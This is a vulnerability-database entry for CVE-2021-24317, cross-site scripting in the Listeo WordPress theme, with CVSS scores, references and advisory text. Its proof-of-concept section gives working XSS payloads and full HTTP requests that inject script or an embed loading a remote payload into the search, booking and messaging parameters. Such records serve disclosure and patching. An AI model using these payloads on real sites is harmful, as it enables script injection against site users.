Description
The Listeo WordPress theme before 1.6.11 did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues
{"id": "CVE-2021-24317", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24317", "description": "The Listeo WordPress theme before 1.6.11 did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues", "published": "2021-06-01T14:15:00", "modified": "2021-06-11T18:24:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24317", "reporter": "contact@wpscan.com", "references": ["https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Listeo-WordPress-Theme-v1.6.10.txt", "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174"], "cvelist": ["CVE-2021-24317"], "immutableFields": [], "lastseen": "2022-03-23T14:51:42", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}], 
"rev": 4}, "score": {"value": 1.4, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-06-05T07:38:29", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1403454684438876162", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/QOvijzTuni?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1403454684438876162", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/QOvijzTuni?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1403454671080013833", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/JYlekmX1Uv?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1403454671080013833", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24317 (listeo)) has been published on https://t.co/JYlekmX1Uv?amp=1"}]}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:704D8886-DF9E-4217-88D1-A72A71924174"]}]}, "exploitation": null, "vulnersScore": 1.4}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "purethemes:listeo", "version": "1.6.11", "operator": "lt", "name": "purethemes listeo"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:purethemes:listeo:1.6.11:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.6.11", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Listeo-WordPress-Theme-v1.6.10.txt", "name": 
"https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-79%5D-Listeo-WordPress-Theme-v1.6.10.txt", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174", "name": "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpexploit": [{"lastseen": "2021-08-23T12:24:38", "description": "The theme did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues \\- Unauthenticated Reflected XSS | Search query, vulnerable parameter(s): keyword_search and location_search \\- Authenticated Persistent XSS & XFS | Booking confirmation, vulnerable parameter(s): firstname, lastname, email, phone and message \\- Authenticated Persistent XSS & XFS | Personal messages: action=listeo_send_message&recipient;=&referral;=author_archive&message;=\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-16T00:00:00", "type": "wpexploit", "title": "Listeo < 1.6.11 - Multiple XSS & XFS vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24317"], "modified": "2021-05-17T07:01:32", "id": "WPEX-ID:704D8886-DF9E-4217-88D1-A72A71924174", "href": "", "sourceData": "### -- [ Payloads: ]\r\n\r\n[$] --!>\" autofocus onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//\"\r\n\r\n[$] <!-->\"><!--><embed 
src=https://m0ze.ru/payload/xfsii.html>\r\n\r\n\r\n\r\n### -- [ PoC #1 | Unauthenticated Reflected XSS | Search query: ]\r\n\r\n[!] https://listeo.pro/listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing_category=&action=listeo_get_listings\r\n\r\n[!] GET /listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing_category=&action=listeo_get_listings HTTP/1.1\r\nHost: listeo.pro\r\n\r\n\r\n\r\n### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Booking confirmation: ]\r\n\r\n[!] POST /booking-confirmation/ HTTP/1.1\r\nHost: listeo.pro\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: https://listeo.pro/booking-confirmation/\r\nCookie: [user cookies]\r\n\r\nconfirmed=yessir&value=%7B%5C%22listing_type%5C%22%3A%5C%22rental%5C%22%2C%5C%22listing_id%5C%22%3A%5C%22578%5C%22%2C%5C%22date_start%5C%22%3A%5C%222021-09-07%5C%22%2C%5C%22date_end%5C%22%3A%5C%222021-09-10%5C%22%2C%5C%22adults%5C%22%3A%5C%221%5C%22%2C%5C%22services%5C%22%3A%5B%5D%7D&listing_id=578&coupon_code=&firstname=Ex%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&lastname=Mi%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&email=hatosoh945%40hrandod.com&phone=%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&message=%3C%2Ftextarea%3E%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E\r\n\r\n\r\n\r\n### -- [ PoC #3 | Authenticated Persistent XSS & XFS | Personal messages: ]\r\n\r\n[!] 
POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: listeo.pro\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://listeo.pro/author/m0ze/\r\nCookie: [user cookies]\r\n\r\naction=listeo_send_message&recipient=1506&referral=author_archive&message=%3C!--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E\r\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-08-23T12:24:38", "description": "The theme did not properly sanitise some parameters in its Search, Booking Confirmation and Personal Message pages, leading to Cross-Site Scripting issues \\- Unauthenticated Reflected XSS | Search query, vulnerable parameter(s): keyword_search and location_search \\- Authenticated Persistent XSS & XFS | Booking confirmation, vulnerable parameter(s): firstname, lastname, email, phone and message \\- Authenticated Persistent XSS & XFS | Personal messages: action=listeo_send_message&recipient;=&referral;=author_archive&message;=\n\n### PoC\n\n### -- [ Payloads: ] [$] --!>\" autofocus onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//\" [$] ### -- [ PoC #1 | Unauthenticated Reflected XSS | Search query: ] [!] https://listeo.pro/listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location;_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing;_category=&action;=listeo_get_listings [!] GET /listings/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&location;_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);location=`https://m0ze.ru`;//%22&tax-listing;_category=&action;=listeo_get_listings HTTP/1.1 Host: listeo.pro ### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Booking confirmation: ] [!] 
POST /booking-confirmation/ HTTP/1.1 Host: listeo.pro Content-Type: application/x-www-form-urlencoded Referer: https://listeo.pro/booking-confirmation/ Cookie: [user cookies] confirmed=yessir&value;=%7B%5C%22listing_type%5C%22%3A%5C%22rental%5C%22%2C%5C%22listing_id%5C%22%3A%5C%22578%5C%22%2C%5C%22date_start%5C%22%3A%5C%222021-09-07%5C%22%2C%5C%22date_end%5C%22%3A%5C%222021-09-10%5C%22%2C%5C%22adults%5C%22%3A%5C%221%5C%22%2C%5C%22services%5C%22%3A%5B%5D%7D&listing;_id=578&coupon;_code=&firstname;=Ex%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&lastname;=Mi%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&email;=hatosoh945%40hrandod.com&phone;=%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E&message;=%3C%2Ftextarea%3E%3C%21--%3E%22%3E%3C%21--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E ### -- [ PoC #3 | Authenticated Persistent XSS & XFS | Personal messages: ] [!] 
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: listeo.pro Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://listeo.pro/author/m0ze/ Cookie: [user cookies] action=listeo_send_message&recipient;=1506&referral;=author_archive&message;=%3C!--%3E%3Cembed+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-16T00:00:00", "type": "wpvulndb", "title": "Listeo < 1.6.11 - Multiple XSS & XFS vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24317"], "modified": "2021-05-17T07:01:32", "id": "WPVDB-ID:704D8886-DF9E-4217-88D1-A72A71924174", "href": "https://wpscan.com/vulnerability/704d8886-df9e-4217-88d1-a72a71924174", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}